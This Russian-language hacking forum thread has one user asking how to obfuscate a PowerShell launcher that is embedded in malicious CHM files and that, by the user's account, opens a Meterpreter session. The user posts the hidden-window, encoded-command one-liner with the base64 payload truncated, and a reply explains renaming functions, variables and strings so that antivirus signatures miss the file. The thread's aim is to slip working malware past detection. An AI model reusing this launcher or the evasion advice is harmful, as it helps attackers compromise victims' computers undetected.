• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

Обфускация powershell-кода для последующего внедрения в CHM-файл

A

AlCat

Active member
30.10.2018
38
0
BIT
2
Сгенерирован код.
Код: 
powershell -w 1 -C sv YnA -;sv n ec;sv GHP ((gv YnA).value.toString()+(gv n).value.toString());powershell (gv GHP).value.toString() 'JAB3AFYAUwBBACAAPQAgACcAJA....,бла-бла-еще_много_букавок_H0A'
Позже код используется для внедрения в CHM-файл как описано тут Вредоносные CHM
Всё работает, сессия метерпертера прилетает, но палится сие антивирусами. То есть нужно провести обфускацию.

Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
 
Сортировать по дате Сортировать по голосам
AlCat сказал(а):
Я не понимаю какую часть кода можно подвергнуть обфускации, и как будет выглядеть соединение обфусцированного и необфуцированного кодов.
....если это вообще возможно...
Нажмите, чтобы раскрыть...
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Ссылка скрыта от гостей
 
За 0 Против
f22 сказал(а):
Номинально любую часть кода можно обфусцировать.
Что значит соединение?
Предположим, у тебя в коде есть вызов какой-то функции
start_this_super_puper_main_start()

Простейшая обфускация банально заменит имя этой функции на
какую-то абракадабру, вида safdhKJGdskfj()
по такому же принципу будет изменены все названия переменных,
строк и прочая текстовая информация.

Ну а компилятору или интерпретатору, совершенно без разницы, как та или иная
функция называется, он-то всё это переведёт в байт код или машинный код,
который будет выполняться уже уровнем ниже.

А вот в базе данных сигнатур антивируса, записи о подобном коде уже не будет,
что и позволит антивирусу пропустить этот файл.

Ссылка скрыта от гостей
Нажмите, чтобы раскрыть...
Спасибо что обратили внимание на мой вопрос.
Касаемо статьи на "хакере" -
Ссылка скрыта от гостей
.

...все таки с проблемой нужно переспать. )
С утра соображается лучше.
 
Последнее редактирование:
За 0 Против
За 0 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ